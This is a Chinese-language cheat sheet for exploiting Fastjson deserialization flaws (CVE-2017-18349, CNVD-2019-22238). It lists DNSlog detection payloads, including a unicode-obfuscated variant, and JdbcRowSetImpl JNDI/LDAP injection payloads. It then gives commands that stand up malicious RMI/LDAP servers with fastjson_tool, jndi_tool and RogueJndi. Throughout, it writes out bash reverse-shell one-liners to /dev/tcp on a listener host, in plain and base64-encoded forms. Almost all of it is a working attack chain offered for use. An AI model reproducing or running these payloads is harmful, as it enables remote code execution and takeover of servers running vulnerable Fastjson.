Fastjson漏洞利用

CVE-2017-18349(RCE)

影响范围：fastjson < 1.2.25

检测方法

1.GET方法改成POST方法

2.添加或修改Content-Type:application/json

{"tN":
{"@type":"java.net.InetSocketAddress"{"address":,"val":"7lxpfc.dnslog.cn"}}}

3.union编码(不一定)

{"tN":
{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0049\u006e\u0065\u0074\u0053\u006f\u0063\u006b\u0065\u0074\u0041\u0064\u0064\u0072\u0065\u0073\u0073"{"\u0061\u0064\u0064\u0072\u0065\u0073\u0073":,"\u0076\u0061\u006c":"\u0037\u006c\u0078\u0070\u0066\u0063\u002e\u0064\u006e\u0073\u006c\u006f\u0067\u002e\u0063\u006e"}}}

CNVD‐2019‐22238(RCE)

检测方法

{"Bg":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"hB":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://4wpk4q.dnslog.cn/test","autoCommit":true}}

利用方法

fastjson_tool.jar

执行命令

java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 9999 "touch /tmp/233"

反弹shell命令（反弹shell要base64）

bash -i >& /dev/tcp/192.168.47.158/2333 0>&1

base64后（https://tool.chinaz.com/tools/base64.aspx）

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ3LjE1OC8yMzMzIDA+JjE=

创建rmi/ldap服务器

java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.47.1 9999 "bash -c {echo,base64编码内容}|{base64,-d}|{bash,-i}"

java -cp fastjson_tool.jar fastjson.HRMIPServer 192.168.47.1 9999 "bash -c {echo,base64编码内容}|{base64,-d}|{bash,-i}"

payload中要换成rmi://

payload

{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.47.1:9999/Object","autoCommit":true}}

jndi_tool.jar

java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/192.168.47.1/2333 0>&1"

java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 192.168.47.1 8088 file=req chunk=on

java -cp jndi_tool.jar jndi.fastjson.BCELEncode "bash -i >& /dev/tcp/192.168.47.158/2333 0>&1"

Rogue JNDI

java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ3LjE1OC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" --hostname "192.168.47.1"